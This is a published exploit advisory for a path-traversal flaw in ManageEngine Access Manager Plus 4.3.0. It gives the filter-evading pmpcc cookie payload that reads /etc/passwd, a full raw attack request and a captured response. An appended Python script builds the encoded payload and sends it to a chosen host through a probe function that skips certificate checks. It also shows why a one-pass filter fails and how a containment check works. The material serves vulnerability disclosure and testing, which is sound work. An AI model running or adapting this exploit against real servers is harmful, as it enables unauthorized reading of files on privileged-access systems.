<pre><code>## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal<br />## Author: nu11secur1ty<br />## Date: 11.22.2023<br />## Vendor: https://www.manageengine.com/<br />## Software: https://www.manageengine.com/privileged-session-management/download.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)<br /><br />## Description:<br />The `pmpcc` cookie is vulnerable to path traversal, enabling read access<br />to arbitrary files on the server.<br />The testing payload<br />..././..././..././..././..././..././..././..././..././..././etc/passwd<br />was submitted in the pmpcc cookie (URL-encoded as `...%2f.%2f` per hop in<br />the request below). Each `..././` hop collapses to a plain `../` if the<br />application strips `../` from the value only once, which is why this form<br />is used instead of a plain `../` chain.<br />The requested file was returned in the application's response.<br />An attacker can easily read the server's JS structures and other files<br />and use them to stage further, more damaging actions.<br />When reproducing, confirm the traversal by looking for passwd entries<br />(lines of the form `root:x:0:0:`) in the response body: the excerpt shown<br />below is the localized JS string bundle that GET_AMP_JS_VALUES normally<br />returns, so a 200 response on its own is not proof.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploits:<br />```http<br />GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1<br />Host: localhost:9292<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;<br />_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;<br />JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;<br />JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Mobile: ?0<br />X-Requested-With: XMLHttpRequest<br />Sec-CH-UA-Platform: Windows<br />Referer: https://localhost:9292/AMPHome.html<br />```<br /><br />[+] Response:<br /><br />```<br />,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is<br 
/>e-mailed to the user who raises the request, the user who closes the<br />request and also to those e-mail ids specified at the time of closing<br />the request.'<br />,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username'<br />,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next<br />synchronization is scheduled to run on'<br />,'js.agent.csharp_Windows_Agent':'C# Windows Agent'<br />,'js.PassTrixMainTab.in_sec':'Seconds'<br />,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or<br />paste the CSR content.'<br />,'js.connection.colors':'Colors'<br />,'js.general.ShareToGroups':'Share resource to user groups'<br />,'js.connection.mapdisk':'Drives'<br />,'jsp.admin.Support.User_Forums':'User Forums'<br />,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For<br />cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a<br />URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)'<br />,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly<br />integrate and perfectly fit into the pre-designed and automated<br />integrations of the below listed RPA-powered platforms, to simulate<br />the routine manual password retrieval from the PAM360 vault.'<br />,'js.discovery.loadhostnamefromfile':'From file'<br />,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please<br />enter a valid Implementation Class'<br />,'js.general.GroupedResources':'Grouped Resources'<br />,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.'<br />,'PROCESSID':'Process Id'<br />,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services<br />fetched successfully'<br />,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled'<br />,'js.commonstr.search':'Search'<br />,'js.discovery.usercredential_type':'Credential Type'<br />,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check<br />high availability 
status every <input type=\"text\" class=\"txtbox\"<br />name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"<br />style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"<br />> minutes.'<br />,'pki.js.help.entervalidnumber':'Please enter a valid number for<br />Numeric Field Default Value.'<br />,'js.remoteapp.fetch':'Fetch'<br />,'js.admin.HighAvailability.configured_successfully':'Configured Successfully'<br />,'js.generalSettings_searchTerm_Password_reset':'Password Reset,<br />Reason for password reset, disable ticket id, waiting time, wait time<br />for service account password reset, linux unix password reset'<br />,'letsencrypt.enter.domainnames':'Enter domain names'<br />,'js.discovery.resourcetype':'Resource Type'<br />,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\''<br />,'js.report.timeline.todate':'Valid To'<br />,'js.general_Language_Changed_Successfully':'Language Changed Successfully'<br />,'js.aws.credentials.label':'AWS Credential'<br />,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable<br />purging of audit trails.'<br />,'js.general.user.orgn_bulkManage':'Manage Organization'<br />,'js.rolename.SSH_KEY':'Create\/Add key'<br />,'js.admin.admin.singledbmultiserver.name':'Application Scaling'<br />,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report'<br />,'js.settings.breach_settings.disable_api':'Disable API Access'<br />,'js.cmd.delete.not_possible':'Command cannot be deleted as it is<br />already added to the following command set(s).'<br />,'js.settings.notification.domaincontent':'Notify if domains are<br />expiring within'<br />,'js.aws.searchuser':'--Search UserName--'<br />,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing<br />system settings in Admin >> General >> Ticketing System Integration.'<br />,'js.discovery.port':'Gateway Port'<br />,'usermanagement.showCertificates':'Show Certificates'<br 
/>,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory<br />cannot be empty'<br />,'js.sshreport.title':'SSH Resource Report'<br />,'js.encryptionkey.update':'Update'<br />,'js.aws.regions':'Region'<br />,'js.settingsTitle1.UserManagement':'User Management'<br />,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length'<br />,'js.commonstr.selectResources':'Select Resources'<br />,'RULENAME':'Rule Name'<br />,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User<br />Group added successfully'<br />,'js.reports.SSHReports.title':'SSH Reports'<br />,'js.CommonStr.ValueIsLess':'value is less than 2'<br />,'js.discovery.discoverystatus':'Discovery Status'<br />,'js.settings.security_settings.Web_Access':'Web Access'<br />,'js.general.node_name_cannot_be_empty':'Node name cannot be empty'<br />,'js.deploy.audit':'Deploy Audit'<br />,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority'<br />,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate<br />user group(s) to exempt from access control.'<br />,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)'<br />,'js.admin.HighAvailability.High_Availability_status':'Status'<br />,'settings.metracker.note0':'Disable ME Tracker if you do not wish to<br />allow ManageEngine to collect product usage details.'<br />,'SERVICENAME':'Service Name'<br />,'settings.metracker.note1':'Access Manager Plus server has to be<br />restarted for the changes to take effect.'<br />,'js.general.NewPinMismatch':'New PIN Mismatch'<br />,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\''<br />,'java.ScheduleUtil.minutes':'minutes'<br />,'js.admin.sdpop_change.tooltip':'Enabling this option will require<br />your users to provide valid Change IDs for the validation of password<br />access requests and other similar operations. 
Leaving this option<br />unchecked requires the users to submit valid Request IDs for<br />validation.'<br />,'js.privacy_settings.title.redact':'Redact'<br />,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25<br />resources can be selected'<br />,'js.aboutpage.websitetitle':'Website'<br />,'js.customize.NumericField':'Numeric Field'<br />,'js.please.select.file':'Please select a file to upload.'<br />,'js.AutoLogon.Remote_connections':'Remote Connections'<br />,'pki.snmp.port':'Port'<br />,'java.dashboardutils.TODAY':'TODAY'<br />,'js.schedule.starttime':'Start Time'<br />,'js.ssh.keypassphrase':'Passphrase'<br />,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus'<br />,'js.analytics.tab.ueba.msg4':'guide'<br />,'js.analytics.tab.ueba.msg5':'to complete the integration. For any<br />further questions, please write to us at<br />pam360-support@manageengine.com.'<br />,'js.reportType.Option7.UserAuditReport':'Audit Report'<br />,'js.common.csr':'CSR'<br />,'js.globalsign.reissue.order':'Reissue Order'<br />,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior<br />for individual users and entities by mapping different user accounts'<br />,'js.analytics.tab.ueba.msg7':'Verify actionable reports that<br />symbolize compromise with details about actual behavior and expected<br />behavior.'<br />,'js.resources.importcredential':'Import Credentials'<br />,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for<br />PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from<br />different sources, including firewalls, routers, workstations,<br />databases, file servers and cloud services. Any deviation from normal<br />behavior is classified as a time, count, or pattern anomaly. 
It then<br />gives actionable insight to the IT Administrator with the use of risk<br />scores, anomaly trends, and intuitive reports.'<br />,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:'<br />,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360<br />instance, download Log360 UEBA from the below link and follow the<br />instructions in this'<br />,'js.settingsTitle2.MailServer':'Mail Server'<br />,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing<br />AMP Encryption Key'<br />,'settings.unmappedmails.email':'E-mail Address'<br />,'amp.connection.connection_type':'Connection Type'<br />,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based<br />on activity time, count, and pattern.'<br />,'godaddy.contactphone':'Contact Phone'<br />,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already<br />implemented. Implement with some other class.'<br />,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in<br />Windows devices, SQL servers, FTP servers, and network devices such as<br />routers, firewalls, and switches.'<br />,'js.rolename.freeCA.acme':'ACME'<br />,'digicert.label.dcv.cname':'CNAME Token'<br />,'js.helpcontent.createuser':'User Creation '<br />,'pgpkeys.key.details':'Key Information'<br />,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status'<br />,'js.HomeTab.TaskAuditView':'Task Audit'<br />,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups<br />Shared With User Group(s)'<br />,'js.common.importcsr.format':'(File format should be .csr)'<br />,'js.notificationpolicy.Submit':'Save'<br />,'pmp.vct.User_Audit_Configuration':'User Audit Configuration'<br />...<br />...<br />...<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))<br /><br />## Reference:<br 
/>[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/scdzsb)<br /><br />## Time spent<br />`03:00:00`<br /><br /></code></pre>
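The following Python is an added worked example and is not part of the advisory above or of the Access Manager Plus code base. It shows why the `..././` hop in the pmpcc payload survives a filter that strips `../` once, how the cookie value in the captured request is encoded, the containment check a correct path resolver would apply (under which `...` is just an ordinary directory name, so the evasion form only becomes dangerous after such a filter has rewritten it), and how to distinguish a genuine /etc/passwd body from the application's JS string bundle. `BASE_DIR`, the `probe()` parameters and the sample bodies in the test are assumptions made for illustration; nothing here is taken from the product.

```python
# Added example (not from the advisory or from Access Manager Plus).
# BASE_DIR is a hypothetical lookup root; probe() is a network helper that
# mirrors the captured request and is not exercised offline.
import http.client
import posixpath
import re
import ssl
from typing import Optional, Tuple
from urllib.parse import quote, unquote

BASE_DIR = "/opt/amp/webapps/amp/js/"   # assumption: directory the lookup is meant to stay in
DEPTH = 10                              # hops used in the advisory's payload


def build_payload(depth: int = DEPTH, evade: bool = True) -> str:
    """Raw traversal string. evade=True uses the advisory's `..././` hop."""
    hop = "..././" if evade else "../"
    return hop * depth + "etc/passwd"


def build_cookie(payload: str) -> str:
    """Percent-encode the slashes like the captured request (`...%2f.%2f...`)."""
    return "pmpcc=" + quote(payload, safe="").replace("%2F", "%2f")


def naive_sanitize(value: str) -> str:
    """A typical broken filter: remove `../` in a single pass.
    `..././` loses its inner `../` and becomes exactly `../`."""
    return value.replace("../", "")


def is_contained(cookie_value: str, base: str = BASE_DIR) -> bool:
    """Hardened check: decode (twice, to cover double encoding), normalise,
    then require the result to remain under base. posixpath.normpath treats
    `...` as an ordinary name, so the evasion payload stays inside base
    until something like naive_sanitize turns it into real `../` hops."""
    decoded = unquote(unquote(cookie_value))
    resolved = posixpath.normpath(posixpath.join(base, decoded))
    return resolved == base.rstrip("/") or resolved.startswith(base)


# A passwd entry: name:password:uid:gid:... at the start of a line.
PASSWD_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:]*:\d+:\d+:", re.M)


def looks_like_passwd(body: str) -> bool:
    """True only for genuine passwd entries, not for JS strings that merely
    mention 'passwd' (the GET_AMP_JS_VALUES bundle does)."""
    return bool(PASSWD_LINE.search(body))


def probe(host: str, port: int = 9292, cookie: Optional[str] = None,
          timeout: float = 10.0) -> Tuple[int, bool]:
    """Send the advisory's request over HTTPS (self-signed cert tolerated)
    and return (status, passwd_found). Network call; not run offline."""
    cookie = cookie or build_cookie(build_payload())
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    conn.request("GET", "/amp/webapi/?requestType=GET_AMP_JS_VALUES",
                 headers={"Cookie": cookie, "X-Requested-With": "XMLHttpRequest"})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, looks_like_passwd(body)


if __name__ == "__main__":
    raw = build_payload()
    print(build_cookie(raw))
    print("after one-pass strip:       ", naive_sanitize(raw))
    print("contained as sent?          ", is_contained(quote(raw, safe="")))
    print("contained if stripped first?", is_contained(naive_sanitize(raw)))
```

Run it as-is to see the encoded cookie and the two containment results; call `probe("localhost")` against a test instance to have the passwd check, rather than the status code, decide whether the traversal actually returned the file.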